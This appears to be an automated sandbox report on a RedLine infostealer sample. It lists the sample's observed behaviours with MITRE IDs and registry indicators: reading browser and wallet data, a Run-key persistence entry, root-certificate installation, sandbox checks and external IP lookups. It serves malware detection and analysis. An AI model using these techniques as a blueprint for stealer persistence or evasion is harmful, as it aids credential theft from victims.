redline | 62be0ca52ea9ebc4c577d597b919f6b90cebdcc2179d7d482a04bf5731eec720

System Information Discovery

Processes:

8709834.exe4691549.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8709834.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4691549.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4691549.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8709834.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

Sun038db98f99bf9a.exeSun038aa349e3318e.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation	Sun038db98f99bf9a.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation	Sun038aa349e3318e.exe

Loads dropped DLL 64 IoCs

Processes:

setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.exeSun038aa349e3318e.exeSun0324aba28588c0.exeSun033e271e0ce96c08.exeSun0397381f1f458e.execmd.execmd.execmd.exeSun038db98f99bf9a.exeSun03e4aeb7e43a1c.execmd.execmd.exeSun03f0dc4460bc9.execmd.exeSun03f5d51697d04.exeSun0397381f1f458e.exeSun03d477f1a31.exeSun03f5d51697d04.tmpSun03f5d51697d04.exeSun03f5d51697d04.tmp

pid	process
1692	setup_x86_x64_install.exe
2028	setup_installer.exe
2028	setup_installer.exe
2028	setup_installer.exe
2028	setup_installer.exe
2028	setup_installer.exe
2028	setup_installer.exe
680	setup_install.exe
680	setup_install.exe
680	setup_install.exe
680	setup_install.exe
680	setup_install.exe
680	setup_install.exe
680	setup_install.exe
680	setup_install.exe
1852	cmd.exe
1832	cmd.exe
1832	cmd.exe
1920	cmd.exe
1920	cmd.exe
1100	cmd.exe
1100	cmd.exe
1800	cmd.exe
1228	cmd.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
568	Sun0324aba28588c0.exe
568	Sun0324aba28588c0.exe
1096	Sun033e271e0ce96c08.exe
1096	Sun033e271e0ce96c08.exe
1088	Sun0397381f1f458e.exe
1088	Sun0397381f1f458e.exe
1736	cmd.exe
712	cmd.exe
112	cmd.exe
712	cmd.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
112	cmd.exe
1088	Sun0397381f1f458e.exe
1036	Sun03e4aeb7e43a1c.exe
1036	Sun03e4aeb7e43a1c.exe
1840	cmd.exe
1340	cmd.exe
1184	Sun03f0dc4460bc9.exe
1184	Sun03f0dc4460bc9.exe
2032	cmd.exe
1868	Sun03f5d51697d04.exe
1868	Sun03f5d51697d04.exe
1472	Sun0397381f1f458e.exe
1472	Sun0397381f1f458e.exe
856	Sun03d477f1a31.exe
856	Sun03d477f1a31.exe
1868	Sun03f5d51697d04.exe
1300	Sun03f5d51697d04.tmp
1300	Sun03f5d51697d04.tmp
1300	Sun03f5d51697d04.tmp
1300	Sun03f5d51697d04.tmp
524	Sun03f5d51697d04.exe
524	Sun03f5d51697d04.exe
524	Sun03f5d51697d04.exe
1248	Sun03f5d51697d04.tmp
1248	Sun03f5d51697d04.tmp
1248	Sun03f5d51697d04.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

6391113.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	6391113.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

Processes:

8709834.exe4691549.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	8709834.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	4691549.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

58 ip-api.com
39 ipinfo.io
40 ipinfo.io
53 ipinfo.io
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

4691549.exe8709834.exe

pid process

2720 4691549.exe
2220 8709834.exe

flow	ioc
58	ip-api.com
39	ipinfo.io
40	ipinfo.io
53	ipinfo.io

pid	process
2720	4691549.exe
2220	8709834.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

Sun03f0dc4460bc9.execonhost.exe

description	pid	process	target process
PID 1184 set thread context of 2144	1184	Sun03f0dc4460bc9.exe	Sun03f0dc4460bc9.exe
PID 3484 set thread context of 3492	3484	conhost.exe	explorer.exe

Drops file in Program Files directory 3 IoCs

Processes:

Sun03f5d51697d04.tmp

description	ioc	process
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Sun03f5d51697d04.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Sun03f5d51697d04.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-S41G9.tmp	Sun03f5d51697d04.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 7 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
552	1728	WerFault.exe	Sun038aa349e3318e.exe
2856	288	WerFault.exe	Sun038db98f99bf9a.exe
2256	1036	WerFault.exe	Sun03e4aeb7e43a1c.exe
2480	2632	WerFault.exe	4.exe
2384	1076	WerFault.exe	Soft1WW01.exe
3784	2904	WerFault.exe	6.exe
396	2428	WerFault.exe	mk.exe

Checks SCSI registry key(s) 3 TTPs 42 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

rubjrierubjrierubjrierubjrierubjrierubjrieSun0324aba28588c0.exerubjrierubjrierubjrierubjrierubjrierubjrierubjrie

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun0324aba28588c0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun0324aba28588c0.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun0324aba28588c0.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rubjrie

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3980 schtasks.exe
Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

2624 taskkill.exe
2660 taskkill.exe
932 taskkill.exe
1836 taskkill.exe
1548 taskkill.exe

pid	process
3980	schtasks.exe

pid	process
2624	taskkill.exe
2660	taskkill.exe
932	taskkill.exe
1836	taskkill.exe
1548	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 7 IoCs

adware spyware

Modify Registry

Processes:

mshta.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Factor = "20"	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Cache = a403000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU	mshta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Enable = "1"	mshta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Size = "10"	mshta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\InitHits = "100"	mshta.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

Sun03d477f1a31.exeChrome5.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Sun03d477f1a31.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Sun03d477f1a31.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Chrome5.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Chrome5.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Chrome5.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Chrome5.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exeSun0324aba28588c0.exeSun038db98f99bf9a.exeSun038aa349e3318e.exeBnbpIxC5RaMUqdV08_JMLpxz.exe

pid	process
1072	powershell.exe
1300	powershell.exe
568	Sun0324aba28588c0.exe
568	Sun0324aba28588c0.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
288	Sun038db98f99bf9a.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1728	Sun038aa349e3318e.exe
1284
2552	BnbpIxC5RaMUqdV08_JMLpxz.exe
2552	BnbpIxC5RaMUqdV08_JMLpxz.exe
1284
2552	BnbpIxC5RaMUqdV08_JMLpxz.exe
1284
2552	BnbpIxC5RaMUqdV08_JMLpxz.exe
1284

Suspicious behavior: GetForegroundWindowSpam 9 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeSun039750b00c.exe

pid process

1284
552 WerFault.exe
2856 WerFault.exe
2256 WerFault.exe
2480 WerFault.exe
2384 WerFault.exe
3784 WerFault.exe
396 WerFault.exe
3300 Sun039750b00c.exe

pid	process
1284
552	WerFault.exe
2856	WerFault.exe
2256	WerFault.exe
2480	WerFault.exe
2384	WerFault.exe
3784	WerFault.exe
396	WerFault.exe
3300	Sun039750b00c.exe

Suspicious behavior: MapViewOfSection 14 IoCs

Processes:

Sun0324aba28588c0.exerubjrierubjrierubjrierubjrierubjrierubjrierubjrierubjrierubjrierubjrierubjrierubjrierubjrie

pid	process
568	Sun0324aba28588c0.exe
1340	rubjrie
2576	rubjrie
2324	rubjrie
2136	rubjrie
3220	rubjrie
3676	rubjrie
3884	rubjrie
3760	rubjrie
1132	rubjrie
1076	rubjrie
2856	rubjrie
2688	rubjrie
4000	rubjrie

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exeSun03d477f1a31.exeSun03ea09aa5c9686e5.exeSun0328255c4bce6fb.exetaskkill.exetaskkill.exeWerFault.exeWerFault.exeWerFault.exeDownFlSetup110.exe4.exe5.exeSun03f0dc4460bc9.exe6.exeWerFault.exe3793266.exetaskkill.exetaskkill.exetaskkill.exe4691549.exe

description	pid	process
Token: SeDebugPrivilege	1300	powershell.exe
Token: SeDebugPrivilege	1072	powershell.exe
Token: SeCreateTokenPrivilege	856	Sun03d477f1a31.exe
